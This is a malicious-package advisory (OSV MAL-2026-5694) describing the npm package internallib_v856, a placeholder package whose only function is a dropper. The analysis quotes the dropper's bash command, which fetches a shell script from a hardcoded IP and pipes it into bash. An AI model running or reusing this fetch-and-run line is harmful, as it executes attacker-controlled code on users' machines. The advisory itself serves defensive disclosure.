MAL-2026-5694

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v856/MAL-2026-5694.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5694

Published

2026-06-12T15:28:22Z

Modified

2026-06-12T16:46:41.927839711Z

Summary

Malicious code in internallib_v856 (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a)

The package's main entry (index.js) exports a single function command() that invokes /bin/bash -c "curl -s http://10.0.0.145:8080/shell.sh | bash || wget -qO- http://10.0.0.145:8080/shell.sh | bash", fetching an unauthenticated shell script over plain HTTP from a hardcoded bare-IP endpoint and piping it directly into bash. Any consumer that requires this package and calls the advertised API will execute attacker-controlled code on their machine. The package metadata is a generic placeholder (name: internallib_v856, description Internal lib for testing, no author, no repository), and the package's only advertised function is the dropper itself — there is no legitimate functionality. Network destination http://10.0.0.145:8080/shell.sh is mutable, attacker-controlled, and unverifiable.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005788",
            "import_time": "2026-06-12T16:32:16.436781596Z",
            "sha256": "d94a6872645a3d5b938f9bc48871dbdff18068bd32d04169c3e421cd6830934a",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T15:28:22Z",
            "versions": [
                "99.0.0"
            ]
        }
    ]
}

References

https://www.npmjs.com/package/internallib_v856/v/99.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / internallib_v856

Package

Name: internallib_v856; View open source insights on deps.dev
Purl: pkg:npm/internallib_v856

Affected ranges

Affected versions

99.*

99.0.0

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "cf43855c54b0e8af2eb86b9fcb23e09e60d9993c38e99848b313c5cac0328ecd",
            "tlsh": "8bf09e4a04ea203d6ba63474ee9a7c26306749125138c551ba8fc1261f8440852ba7dc"
        },
        {
            "path": "package.json",
            "sha256": "5d850d9a3b56882cc7172b51fad29ed24d3eebb822f385b9f79861007b66521a",
            "tlsh": "01c04cb15516582324d543a45ca1890966664e2b5006a5095b672a0d40ea9b759b9b0c"
        }
    ],
    "package_integrity": [
        {
            "filename": "internallib_v856-99.0.0.tgz",
            "hashes": {
                "sha512_sri": "sha512-4XGG32TJnnUYjVwUMgjKmCpVJLOGrkMhh4/mI+rspVP32nDRrUp6JR/FJzkV4o9xqJEudmlaOrF6QCUCfGwR2g==",
                "sha1": "835ca042490b9c353d6289db2ec942584671d508"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/internallib_v856/MAL-2026-5694.json"